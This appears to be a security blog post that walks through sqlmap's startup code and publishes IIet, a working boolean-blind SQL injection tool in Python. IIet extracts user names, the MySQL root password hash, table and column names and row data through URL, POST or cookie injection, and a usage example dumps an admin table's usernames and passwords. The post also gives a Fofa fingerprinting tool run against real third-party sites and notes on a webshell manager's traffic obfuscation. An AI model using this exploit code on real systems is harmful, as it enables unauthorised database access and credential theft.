
Sqlmap

The first thing to locate is the function that tests for injection.

sqlmap's main function begins by running a series of setup functions.

dirtyPatches sets a maximum line length for HTTP responses; then, if the system is Windows, it imports win_inet_pton and applies some encoding handling (working around bugs that differ between Windows and other platforms).
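
For reference, a minimal sketch of the kind of patch dirtyPatches applies (simplified; the real code lives in lib/core/patch.py and varies across sqlmap versions):

# simplified sketch of one dirtyPatches fix: accept overly long lines in
# HTTP responses instead of letting http.client raise LineTooLong
import http.client as _http_client

def dirtyPatches():
    _http_client._MAXLINE = 1 * 1024 * 1024  # raise the per-line limit to 1 MB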

resolveCrossReferences hands function references across modules (it is not entirely clear why; presumably to avoid circular imports, since at first glance the code would work without it).

checkEnvironment resolves the current module path and performs a Python version check.

setPaths sets up the file paths.

The banner function prints the sqlmap banner.

args = cmdLineParser() parses the command line and assigns the option variables.

Passing -u and stepping through: after it runs, args is a dictionary-like variable holding the key/value options.

initOptions likewise defines a number of attributes: _setConfAttributes initializes the conf dictionary and _setKnowledgeBaseAttributes initializes the kb dictionary.

_mergeOptions also sets up options: a for loop copies the values from args into conf.
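
A minimal sketch of what that merge amounts to (simplified; the real _mergeOptions in lib/core/option.py also handles configuration files and defaults):

# copy every parsed command-line option into conf unless conf already
# carries a value for it
def _mergeOptions(inputOptions, conf):
    for key, value in inputOptions.items():
        if key not in conf or conf[key] is None:
            conf[key] = value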

A few more variable-assignment and setup functions follow.

The start function that comes next is the entry point where injection testing actually begins.

start first does some variable configuration, then creates a folder under the output directory and writes the test target and related information into it.

IIet (blind-injection information extraction tool)

https://github.com/XiaoMMing9/IIet

The initial hand-written design notes for the project.

IIet is a script that extracts database information through integer-based injection (boolean blind injection is supported). It supports GET/POST requests, can carry cookie identity data, and works for url/data/cookie injection points. It can retrieve user(), database(), the hash of the root password, and the table information of the current database, and it can bypass magic-quotes style filtering (addslashes).
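
The core technique, distilled from the full script below: wrap a boolean condition in if(...,1,0), inject it, and binary-search the answer on whether the marker string shows up in the response. Here probe(pos, mid) stands in for one injected request:

# distilled core of the boolean-blind binary search used throughout the
# script; probe sends e.g. "if(ord(substring(user(),{pos},1))>{mid},1,0)"
# and returns True when the response contains the marker (-c) string
def search_char(probe, pos):
    low, high = 32, 126  # printable ASCII
    while low <= high:
        mid = (low + high) // 2
        if probe(pos, mid):
            low = mid + 1
        else:
            high = mid - 1
    return chr(low)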

Python code

import requests
import argparse
import re

def Verify():
    try:
        if args.p:
            response = requests.post(args.u, headers=headers, proxies=proxies, cookies=Cookies, data=data, verify=False)
        else:
            response = requests.get(args.u, headers=headers, proxies=proxies, cookies=Cookies, verify=False)
        if re.search(re.escape(args.t), response.text):
            print(f'Found "{args.t}" in the response of {args.u}, match succeeded')
            return True
    except requests.RequestException:
        print(f'Request to {args.u} failed or timed out')  # bail out when the request raises
        exit()
    print(f'"{args.t}" not found in the response; check the URL, headers and so on')
    exit()

def Connect():
    Cookies = headers['Cookie']
    url = args.u
    low = 1
    high = 20
    print('Assuming user/database length is at most 20')
    while low <= high:
        mid = (low + high) // 2
        if args.m == 'password':
            length = 41  # a MySQL password hash is 41 characters ('*' plus 40 hex digits)
            break
        else:
            if args.m == 'user':
                sql = f"if(length(user())>{mid},1,0) -- "
            elif args.m == 'database':
                sql = f"if(length(database())>{mid},1,0) -- "
            if args.i == 'cookies':
                headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
            elif args.i == 'data':
                data[args.pn] = args.pv + '-' + sql
            elif args.i == 'url':
                if '?' in args.u:
                    url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
                else:
                    url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
            if args.p:
                s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
            else:
                s = requests.get(url, headers=headers, proxies=proxies, verify=False)
            matchs = re.search(args.c, s.text)
            if matchs:
                low = mid + 1
            else:
                high = mid - 1
            length = low  # kept inside the loop so the password break above preserves length = 41
    print(f"{args.m} length: {length}")
    # binary-search each character
    result = ''
    for pos in range(1, length + 1):
        low = 32
        high = 126
        while low <= high:
            mid = (low + high) // 2
            if args.m == 'user':
                sql = f"if(ord(substring(user(),{pos},1))>{mid},1,0) -- "
            elif args.m == 'password':
                sql = f"if(ord(substring((select authentication_string from mysql.user where user=substring(user(),1,4)),{pos},1))>{mid},1,0) -- "
            elif args.m == 'database':
                sql = f"if(ord(substring(database(),{pos},1))>{mid},1,0) -- "
            if args.i == 'cookies':
                headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
            elif args.i == 'data':
                data[args.pn] = args.pv + '-' + sql
            elif args.i == 'url':
                if '?' in args.u:
                    url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
                else:
                    url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
            if args.p:
                s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
            else:
                s = requests.get(url, headers=headers, proxies=proxies, verify=False)
            matchs = re.search(args.c, s.text)
            if matchs:
                low = mid + 1
            else:
                high = mid - 1
        result += chr(low)
    print(f"{args.m}: {result}")

def Information():
    Cookies = headers['Cookie']
    url = args.u
    tables = []
    columns = []
    low = 1
    high = 100
    print('Assuming at most 100 tables, and at most 100 columns per table')
    while low <= high:
        mid = (low + high) // 2
        if args.m == 'table':
            sql = f"(select if((count(*))>{mid}, 1, 0) from information_schema.tables where table_schema = database()) --"
        elif args.m == 'column':
            sql = f"(select if((count(column_name))>{mid}, 1, 0) from information_schema.columns where table_name = (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT {int(args.S) - 1},1)) --"
        if args.i == 'cookies':
            headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
        elif args.i == 'data':
            data[args.pn] = args.pv + '-' + sql
        elif args.i == 'url':
            if '?' in args.u:
                url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
            else:
                url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
        if args.p:
            s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
        else:
            s = requests.get(url, headers=headers, proxies=proxies, verify=False)
        matchs = re.search(args.c, s.text)
        if matchs:
            low = mid + 1
        else:
            high = mid - 1
    count = low
    if args.m == 'table':
        print(f"Number of tables: {count}")
    if args.m == 'column':
        print(f"Number of columns: {count}")
    for i in range(count):
        low = 1
        high = 20
        print('Assuming table names are at most 20 characters (column names at most 100)')
        while low <= high:
            mid = (low + high) // 2
            if args.m == 'table':
                sql = f"if((SELECT length(table_name) FROM information_schema.tables WHERE table_schema = database() LIMIT {i},1)>{mid},1,0) -- "
            elif args.m == 'column':
                sql = f"if((SELECT length(column_name) FROM information_schema.columns WHERE table_name = (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT {int(args.S) - 1},1) LIMIT {i},1)>{mid},1,0) -- "
            if args.i == 'cookies':
                headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
            elif args.i == 'data':
                data[args.pn] = args.pv + '-' + sql
            elif args.i == 'url':
                if '?' in args.u:
                    url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
                else:
                    url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
            if args.p:
                s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
            else:
                s = requests.get(url, headers=headers, proxies=proxies, verify=False)
            matchs = re.search(args.c, s.text)
            if matchs:
                low = mid + 1
            else:
                high = mid - 1
        name_length = low
        name = ''
        for pos in range(1, name_length + 1):
            low = 0
            high = 126
            while low <= high:
                mid = (low + high) // 2
                if args.m == 'table':
                    sql = f"if(ord(substring((SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT {i},1),{pos},1))>{mid},1,0) -- "
                elif args.m == 'column':
                    sql = f"if(ord(substring((SELECT column_name FROM information_schema.columns WHERE table_name = (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT {int(args.S) - 1},1) LIMIT {i},1),{pos},1))>{mid},1,0) -- "
                if args.i == 'cookies':
                    headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
                elif args.i == 'data':
                    data[args.pn] = args.pv + '-' + sql
                elif args.i == 'url':
                    if '?' in args.u:
                        url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
                    else:
                        url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
                if args.p:
                    s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
                else:
                    s = requests.get(url, headers=headers, proxies=proxies, verify=False)
                matchs = re.search(args.c, s.text)
                if matchs:
                    low = mid + 1
                else:
                    high = mid - 1
            name += chr(low)
        print(f"{name}")
        if args.m == 'table':
            tables.append(name)
        elif args.m == 'column':
            columns.append(name)
    if args.m == 'table':
        return tables
    elif args.m == 'column':
        return columns

def Getdata():
    Cookies = headers.get('Cookie', '')
    url = args.u
    low = 0
    high = 100
    while low <= high:
        mid = (low + high) // 2
        sql = f"if((select count(*) from {args.T})>{mid},1,0)"
        if args.i == 'cookies':
            headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
        elif args.i == 'data':
            data[args.pn] = args.pv + '-' + sql
        elif args.i == 'url':
            url = args.u + ('&' if '?' in args.u else '?') + f'{args.pn}={args.pv}-{sql}'
        if args.p:
            s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
        else:
            s = requests.get(url, headers=headers, proxies=proxies, verify=False)
        matchs = re.search(args.c, s.text)
        if matchs:
            low = mid + 1
        else:
            high = mid - 1
    numbers = low
    if 100 > low:
        print(f"{args.T} holds {numbers} rows")
    else:
        print("Capped at the 100-row limit")
    for i in range(int(numbers)):
        datas = ''
        for col in columns:
            low = 1
            high = 100
            while low <= high:
                mid = (low + high) // 2
                sql = f"if(length((SELECT {col} from {args.T} limit {i},1))>{mid},1,0)"
                if args.i == 'cookies':
                    headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
                elif args.i == 'data':
                    data[args.pn] = args.pv + '-' + sql
                elif args.i == 'url':
                    url = args.u + ('&' if '?' in args.u else '?') + f'{args.pn}={args.pv}-{sql}'
                if args.p:
                    s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
                else:
                    s = requests.get(url, headers=headers, proxies=proxies, verify=False)
                matchs = re.search(args.c, s.text)
                if matchs:
                    low = mid + 1
                else:
                    high = mid - 1
            length = low
            for t in range(1, length + 1):
                low = 0
                high = 126
                while low <= high:
                    mid = (low + high) // 2
                    sql = f"if (ord(substring((SELECT {col} from {args.T} limit {i},1),{t},1))>{mid},1,0)"
                    if args.i == 'cookies':
                        headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
                    elif args.i == 'data':
                        data[args.pn] = args.pv + '-' + sql
                    elif args.i == 'url':
                        url = args.u + ('&' if '?' in args.u else '?') + f'{args.pn}={args.pv}-{sql}'
                    if args.p:
                        s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
                    else:
                        s = requests.get(url, headers=headers, proxies=proxies, verify=False)
                    matchs = re.search(args.c, s.text)
                    if matchs:
                        low = mid + 1
                    else:
                        high = mid - 1
                if low > 126:
                    # character is outside ASCII: binary-search its hex value instead
                    low = 0xC280  # start of the multi-byte UTF-8 range
                    high = 0xEFBFBF  # end of the multi-byte UTF-8 range
                    while low <= high:
                        mid = (low + high) // 2
                        sql = f"if (CONV(HEX(SUBSTRING((SELECT {col} from {args.T} limit {i},1),{t},1)), 16, 10) > {mid}, 1, 0)"
                        if args.i == 'cookies':
                            headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
                        elif args.i == 'data':
                            data[args.pn] = args.pv + '-' + sql
                        elif args.i == 'url':
                            url = args.u + ('&' if '?' in args.u else '?') + f'{args.pn}={args.pv}-{sql}'
                        if args.p:
                            s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
                        else:
                            s = requests.get(url, headers=headers, proxies=proxies, verify=False)
                        matchs = re.search(args.c, s.text)
                        if matchs:
                            low = mid + 1
                        else:
                            high = mid - 1
                    hex_result = hex(low)[2:]
                    if len(hex_result) % 2 != 0:
                        hex_result = '0' + hex_result
                    datas += bytes.fromhex(hex_result).decode('utf-8')
                else:
                    datas += chr(low)
            datas += ' '
        print(datas)

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Automated SQL injection script')
    # basic arguments
    parser.add_argument('-u', type=str, required=True, help='vulnerable URL', metavar='Url')
    parser.add_argument('-p', action='store_true', help='use POST; without -p the request is GET')
    parser.add_argument('-i', type=str, choices=['url', 'cookies', 'data'], required=True, help='injection point type, one of [url, cookies, data]', metavar='Injection_Type')
    parser.add_argument('-pn', type=str, required=True, help='injected parameter name', metavar='Param_Name')
    parser.add_argument('-pv', type=str, required=True, help='parameter value', metavar='Param_value')
    parser.add_argument('-c', type=str, required=True, help='marker string used to tell true from false responses', metavar='Characteristic')
    parser.add_argument('-m', type=str, choices=['user', 'password', 'database', 'table', 'column', 'data'], required=True, help='what to extract, one of [user, password, database, table, column, data]', metavar='Type')
    # optional arguments
    parser.add_argument('-C', help='Cookie used for authentication', metavar='Cookie')
    parser.add_argument('-d', help='POST data, e.g. -d "Username=1&password=2"', metavar='Data')
    parser.add_argument('-P', help='proxy, e.g. 127.0.0.1:8080', metavar='proxy')
    parser.add_argument('-U', help='User-Agent; defaults to a Chrome User-Agent', metavar='User-Agent')
    parser.add_argument('-H', help='extra request headers, e.g. -H "token=1&jwt=2"', metavar='Header')
    parser.add_argument("-t", help="connectivity test: check whether the response contains this string", metavar='test_data')
    parser.add_argument('-S', help='index of the table in the current database', metavar='Table_Subscript')
    parser.add_argument('-T', help='table name to query', metavar='Table')
    parser.add_argument('-l', help='columns to query, e.g. -l "username password"', metavar='Columns')
    args = parser.parse_args()
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36'}  # default User-Agent
    if args.U: headers['User-Agent'] = args.U  # User-Agent
    if args.H:  # extra headers
        header_pairs = args.H.split('&')
        for pair in header_pairs:
            key, value = pair.split('=', 1)
            headers[key.strip()] = value.strip()
    proxies = None
    if args.P: proxies = {'http': args.P, 'https': args.P}  # proxies
    Cookies = ''
    if args.C: headers['Cookie'] = args.C  # Cookies
    else: headers['Cookie'] = ''
    data = dict(pair.split('=', 1) for pair in args.d.split('&')) if args.d else None
    if args.t: Verify()  # connectivity check
    if args.l:
        columns = args.l.split(" ")
    else:
        columns = None
    if args.m == 'user' or args.m == 'password' or args.m == 'database':
        Connect()
    elif args.m == 'table' or args.m == 'column':
        Information()
    elif args.m == 'data':
        Getdata()
    else:
        print('Check the -m argument')

A SQL injection test site with magic-quotes (addslashes) filtering

The injection point is in the cookies: integer-type injection in the city parameter

Arguments

-u  http://test.com/?m=2s            the SQL injection URL
-i  cookies                          the injection point is in the cookies
-pn city                             the cookie parameter is city
-pv 3                                the parameter value is 3
-c  /buycars/2018/05/10/102.html     compared with city=3, the city=2 request returns "/buycars/2018/05/10/102.html"
-m  user                             run select user() and extract the user data
-P  127.0.0.1:8080                   proxy through 127.0.0.1:8080

Data extraction test

Retrieving the MySQL password hash

Retrieving database() (select database())

Retrieving the table names

-m column    retrieve the column names
-S 2         select the second table, w_admin

-T w_admin                        query the table w_admin
-l "adminid username password"    list the adminid, username and password data

ToFind (same-source website discovery tool)

https://github.com/XiaoMMing9/ToFind

It discovers a website's characteristic fingerprint, which can then be used to search Fofa for sites built from the same source code.

Python code

import base64
import requests
from bs4 import BeautifulSoup
import re
import random
import math
import argparse
import json
import pandas as pd
import os
from openpyxl import Workbook
from openpyxl.utils.dataframe import dataframe_to_rows

def get_text(url):
    # fetch the page source
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'
    }
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url
        try:
            s = requests.get(url, headers=headers, verify=False)
            if str(s.status_code)[0] == '2': return s.text, url
            else:
                # retry over https
                url = 'https://' + url[len('http://'):]
                s = requests.get(url, headers=headers, verify=False)
                if str(s.status_code)[0] == '2': return s.text, url
                else: return '', url
        except: return '', url
    else:
        try:
            s = requests.get(url, headers=headers, verify=False)
            if str(s.status_code)[0] == '2': return s.text, url
            else: return '', url
        except: return '', url

def get_text_api(source_code):
    # extract API paths from the page source
    # regex: quoted strings that start with "/" or "./"
    pattern = r"['\"]((\/|\.\/)[^\n\r'\"?]+)(\?[^\n\r'\" ]*)?['\"]"
    matches = re.findall(pattern, source_code)
    apis = []
    exclude_api = ['/', '//', '/favicon.ico', '/login', '/register', '/login.html', '/register.html']  # over-common endpoints to exclude
    exclude_list = ['bootstrap', 'chosen', 'bootbox', 'awesome', 'animate', 'picnic', 'cirrus', 'iconfont', 'jquery', 'layui', 'swiper']  # plugin libraries to exclude
    for match in matches:
        match = match[0]  # findall returns tuples, take the first group
        match = re.sub(r'\?.*$', '', match)  # strip query parameters
        # exclude only paths that exactly match an entry in exclude_api
        if match and match not in exclude_api:
            contains_excluded_str = False
            for ex_str in exclude_list:
                if ex_str in match:
                    contains_excluded_str = True
                    break
            # keep the path only if it contains none of the exclude_list strings
            if not contains_excluded_str:
                apis.append(match)
    return apis

def get_all_css_classes(url, text):
    # collect every class name from the css loaded via <link rel="stylesheet" type="text/css" href="" />
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'
    }
    soup = BeautifulSoup(text, 'html.parser')
    css_links = []
    exclude_list = ['bootstrap', 'chosen', 'bootbox', 'awesome', 'animate', 'picnic', 'cirrus', 'iconfont', 'jquery', 'layui', 'swiper']  # plugin libraries to exclude
    for link in soup.find_all('link', rel='stylesheet'):  # collect the external css links
        href = link.get('href')
        if href and re.search(r'\.css(\?.*)?$', href):
            if not any(exclude in href for exclude in exclude_list):
                if href.startswith('http'):
                    css_links.append(href)
                else:
                    css_links.append(requests.compat.urljoin(url, href))
    all_classes = set()
    for css_link in css_links:
        try:
            css_content = requests.get(css_link, headers=headers, verify=False, timeout=10).text  # download the CSS
            if css_content:
                class_pattern = r'\.([\w\-]+)'
                matches = re.findall(class_pattern, css_content)
                all_classes.update(matches)
        except:
            return []
    return sorted(all_classes)  # return the css class names

def get_text_css_class(text):
    # collect the class names used in the page source itself
    soup = BeautifulSoup(text, 'html.parser')
    # find every tag and pull out its class attribute
    all_classes = set()  # a set keeps the class names unique
    for tag in soup.find_all(True):  # every tag
        classes = tag.get('class')  # the tag's class attribute
        if classes:  # if the class attribute exists
            all_classes.update(classes)  # add the class names to the set
    return sorted(all_classes)

def get_power(text):
    # extract what follows "power by" / "powered by"
    pattern = r'(?:powered by|power by)\s+(<a\s+[^>]*href="([^"]+)"[^>]*>|[^<>\s]+)'
    match = re.search(pattern, text, re.IGNORECASE)
    if match:
        if match.group(2):  # matched an <a href="...">
            return match.group(2)  # return the URL
        else:
            return match.group(1)  # return the word or phrase
    return None

def fofa(base):
    # query Fofa: first page, up to 500 fingerprint hits
    with open('config.json', 'r') as f:
        config = json.load(f)
    fofa_api_key = config['fofa_api_key']
    url = f'https://fofa.info/api/v1/search/all?&key={fofa_api_key}&qbase64={base}&size=500'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'
    }
    s = requests.get(url, headers=headers)
    return s.json()

def save_to_file(data, filename, filetype, size_value, url, fingerprint):
    # save the results to a file
    if filetype == 'txt':
        with open(filename, 'a+', encoding='utf-8') as f:
            f.write(f"Source URL: {url}\n")
            f.write(f"Size: {size_value}\n")
            f.write(f"Fingerprint: {fingerprint}\n")
            for item in data:
                f.write("%s\n" % item)
    elif filetype == 'xlsx':
        df_data = pd.DataFrame(data, columns=["URL", "IP", "Port"])
        metadata = {"URL": f"{url}", "Size": size_value, "fingerprint": fingerprint}
        file_exists = os.path.exists(filename)
        if not file_exists:
            with pd.ExcelWriter(filename, engine='openpyxl', mode='w') as writer:
                df_metadata_header = pd.DataFrame(columns=["URL", "Size", "fingerprint"])
                df_metadata_header.to_excel(writer, index=False, startrow=0, header=True)
                df_metadata = pd.DataFrame([metadata])
                df_metadata.to_excel(writer, index=False, header=False, startrow=1)
                header_df = pd.DataFrame(columns=["URL", "IP", "Port"])
                header_df.to_excel(writer, index=False, startrow=2, header=True)
                df_data.to_excel(writer, index=False, header=False, startrow=3)
        else:
            with pd.ExcelWriter(filename, engine='openpyxl', mode='a', if_sheet_exists='overlay') as writer:
                workbook = writer.book
                sheet = workbook.active
                df_metadata_header = pd.DataFrame(columns=["URL", "Size", "fingerprint"])
                for r in dataframe_to_rows(df_metadata_header, index=False, header=True):
                    sheet.append(r)
                df_metadata = pd.DataFrame([metadata])
                for r in dataframe_to_rows(df_metadata, index=False, header=False):
                    sheet.append(r)
                header_df = pd.DataFrame(columns=["URL", "IP", "Port"])
                for r in dataframe_to_rows(header_df, index=False, header=True):
                    sheet.append(r)
                for r in dataframe_to_rows(df_data, index=False, header=False):
                    sheet.append(r)
                workbook.save(filename)

def Gather(url, param=None, output_file=None, execute_fofa=False, b=None):
    start_url = url
    s, url = get_text(url)
    if s == '':
        print(f"{start_url} is unreachable")
        exit()
    apis = get_text_api(s)
    joined_apis = ''  # keep defined even when no APIs are found
    if len(apis) > 0:
        filtered_apis = [api for api in apis if api.endswith(('.css', '.js', '.ico', '.png', '.jpg'))]
        other_apis = [api for api in apis if not api.endswith(('.css', '.js', '.ico', '.png', '.jpg'))]
        if len(other_apis) > 6:
            sqrt_number_other = math.ceil(math.sqrt(len(other_apis)))
            random_other_apis = random.sample(other_apis, min(sqrt_number_other, len(other_apis)))
            joined_apis = random_other_apis
        else:
            if len(filtered_apis) > 3:
                sqrt_number_api = math.floor(math.sqrt(len(filtered_apis)))
                random_filtered_apis = random.sample(filtered_apis, min(sqrt_number_api, len(filtered_apis)))
            elif filtered_apis:
                random_filtered_apis = filtered_apis
            else:
                random_filtered_apis = []
            joined_apis = other_apis + random_filtered_apis
        if len(joined_apis) > 7:
            sqrt_number = math.ceil(math.sqrt(len(joined_apis)))
            random_apis = random.sample(joined_apis, min(sqrt_number, len(joined_apis)))
            joined_apis = '" && "'.join(random_apis)
        else:
            joined_apis = '" && "'.join(joined_apis)
    classes = set(get_text_css_class(s)).intersection(get_all_css_classes(url, s))
    if len(classes) > 0:
        classes = sorted(classes)
        if len(classes) > 9:
            sqrt_number_classes = math.ceil(math.sqrt(len(classes)))
            random_classes = random.sample(classes, min(sqrt_number_classes, len(classes)))
            joined_classes = '" && "'.join(random_classes)
        else:
            joined_classes = '" && "'.join(classes)
    else:
        print("No common class names found.")
        joined_classes = ''
    if b:
        fingerprint = '"' + joined_classes + '"'
    else:
        if joined_classes and joined_apis:
            fingerprint = '("' + joined_apis + '") || ("' + joined_classes + '")'
        else:
            fingerprint = '"' + joined_apis + '"'
    powerby_str = get_power(s)
    if powerby_str:
        fingerprint = '( ' + fingerprint + ' )' + ' && "' + powerby_str + '"'
    if param:
        fingerprint = '( ' + fingerprint + ' )' + ' && "' + param + '"'
    print('Url:\n' + url)
    print('Constructed fingerprint:\n' + fingerprint)
    if execute_fofa:
        results = fofa(base64.b64encode(fingerprint.encode()).decode())
        result_data = results.get('results', [])
        size_value = results.get('size', 0)  # total number of hits
        if output_file:
            filetype = output_file.split('.')[-1]
            save_to_file(result_data, output_file, filetype, size_value, url, fingerprint)
        else:
            print(f"Fofa returned {size_value} results in total")
            for item in result_data:
                print(item)

def Batch(url, param=None, output_file=None, execute_fofa=False, readfile=None, b=None):
    # read URLs in batch
    if readfile:
        with open(readfile, 'r') as f:
            urls = f.readlines()
        for url in urls:
            url = url.strip()
            Gather(url, param, output_file, execute_fofa, b)
    else:
        Gather(url, param, output_file, execute_fofa, b)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Derive a site fingerprint from CSS classes, APIs and so on, and find same-source sites via Fofa; add your Fofa key to the json config file before running a Fofa query")
    # arguments
    parser.add_argument('-u', '--url', type=str, required=False, metavar='', help='website URL')
    parser.add_argument('-p', '--param', type=str, required=False, metavar='', help='extra keyword to append; avoid question marks, double quotes and other special characters or the Fofa search will error out')
    parser.add_argument('-o', '--output', type=str, required=False, metavar='', help='output filename, txt or xlsx')
    parser.add_argument('-r', '--readfile', type=str, required=False, metavar='', help='read URLs from a txt file')
    parser.add_argument('-f', '--fofa', action='store_true', help='run the Fofa search; without -f only the fingerprint is printed')
    parser.add_argument('-b', '--blog', action='store_true', help='the target is a blog or homepage; without -b it is treated as a login page, which has no noisy APIs')
    args = parser.parse_args()
    if args.output:
        valid_formats = ['.txt', '.xlsx']
        file_format = '.' + args.output.split('.')[-1].lower()
        if file_format not in valid_formats:
            print("The output file format must be txt or xlsx")
            exit()
        if os.path.exists(args.output):
            # truncate any existing output file
            if args.output.endswith('.xlsx'):
                wb = Workbook()
                wb.save(args.output)
            else:
                with open(args.output, 'w') as file:
                    pass
    Batch(args.url, args.param, args.output, args.fofa, args.readfile, args.blog)
python ToFind.py -u http://localhost:4000/              (extract the fingerprint of the web service on local port 4000)
python ToFind.py -u http://localhost:4000/ -p hexo      (extract the fingerprint and append the keyword "hexo"; if the extracted fingerprint is "/login", the final fingerprint is "/login" && "hexo")
python ToFind.py -u http://localhost:4000/ -b           (treat the target as a blog homepage; the fingerprint will only contain class names)
python ToFind.py -u http://localhost:4000/ -f           (print the fingerprint and query Fofa for same-source sites, shown on the command line)
python ToFind.py -u http://localhost:4000/ -f -o 1.txt  (print the fingerprint and save the Fofa results to 1.txt)
python ToFind.py -u http://localhost:4000/ -f -o 1.xlsx (print the fingerprint and save the Fofa results to 1.xlsx)
python ToFind.py -r 1.txt -f -o out.xlsx                (batch-read the URLs in 1.txt, query Fofa, export to out.xlsx)

Same-source test

https://jwxt.lcu.edu.cn/jwglxt/xtgl/login_slogin.html

python3 ToFind.py -u https://jwxt.lcu.edu.cn/jwglxt/xtgl/login_slogin.html -f | more

http://speak13.com:81/

python3 ToFind.py -u http://speak13.com:81/ -f | more

(hexo)

python ToFind.py -u http://localhost:4000/ -f -b | more


游魂Webshell

The ASGI application is started through uvicorn's run function, which launches the FastAPI web application; host and port can be configured via command-line arguments.
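
As a minimal sketch of this startup pattern (the argument names here are illustrative, not necessarily the project's exact ones):

# minimal FastAPI + uvicorn startup with host/port taken from the command line
import argparse

import uvicorn
from fastapi import FastAPI

app = FastAPI()

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", type=int, default=8000)
    args = parser.parse_args()
    uvicorn.run(app, host=args.host, port=args.port)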

The FastAPI application is configured by passing in a lifespan parameter.
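
In general, the lifespan hook FastAPI accepts looks like this (a sketch of the pattern; the project's actual startup/shutdown body is not reproduced here):

# the lifespan parameter takes an async context manager: code before the
# yield runs at application startup, code after it runs at shutdown
from contextlib import asynccontextmanager

from fastapi import FastAPI

@asynccontextmanager
async def lifespan(app: FastAPI):
    # startup work goes here
    yield
    # shutdown work goes here

app = FastAPI(lifespan=lifespan)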

test_webshell

Testing a shell hits the /test_webshell endpoint.

When traffic arrives at the /test_webshell endpoint, test_usablility first generates two random parameters and builds them into a payload that is passed through the submit function. submit checks whether any other features are enabled (stashing the payload in the session, HTTP anti-replay, traffic encryption, open_basedir bypass), then generates two more random parameters to form the final payload. With the raw encoder the payload stays in plaintext; with base64 it is base64-encoded. Depending on the configured request method, the payload is placed in the URL or in the POST data, and if obfuscation is enabled extra random parameters are generated as padding (a POST request gets 300 to 500 of them). Finally the HTTP request is sent through submit_http.

@app.post("/test_webshell")
@catch_user_error
async def test_webshell(session_info: session_types.SessionInfo):
    """测试webshell"""
    session = session_manager.session_info_to_session(session_info)
    result = await session.test_usablility()
    if not result:
        return {"code": 0, "data": {"success": False, "msg": "Webshell无法使用"}}
    return {"code": 0, "data": {"success": True, "msg": "Webshell可以使用"}}

test_usablility first generates two random parameters.

Then it goes through submit, which checks whether any other options are enabled (storing the payload in the session, traffic encryption, open_basedir bypass, HTTP anti-replay).

Two more random values are then generated.

The payload is built from the submit_wrapper_php template.

Code encoder

The payload is then run through the encoder (I initially chose base64, so here it is base64-encoded).

submit_http then sends the HTTP request, placing the parameters according to the request method (GET/POST).

POST parameter obfuscation

If POST parameter obfuscation is enabled, random made-up data fields are added to the body (300 to 500 extra parameters).
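
A sketch of what that padding amounts to (the name lengths and character sets here are my guesses, not the project's exact choices):

# pad the POST body with 300-500 random throwaway parameters so the real
# payload parameter is harder to pick out
import random
import string

def pad_post_data(data: dict) -> dict:
    padded = dict(data)
    for _ in range(random.randint(300, 500)):
        name = ''.join(random.choices(string.ascii_lowercase, k=8))
        padded[name] = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    return padded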

The POST request is then sent.

session_start();
function decoder_echo_raw($s)
{
    echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
    global $eg_decoder_hooks;
    for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
        $f = $eg_decoder_hooks[$i];
        $s = $f($s);
    }
    echo decoder_echo_raw($s);
}
echo 'saj' . 'idr';
try {
    decoder_echo('qvwyhl' . 'ofyywf');
} catch (Exception $e) {
    die("POSTEXEC_F" . "AILED");
}
echo 'wwvpvh';

With the PHP code encoder switched to raw:

Chunked transfer

The data is URL-decoded, and then the headers are configured.

Note: there is a bug here. While debugging, when there is a delay the request goes out chunked, but when sent directly it is not chunked.
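
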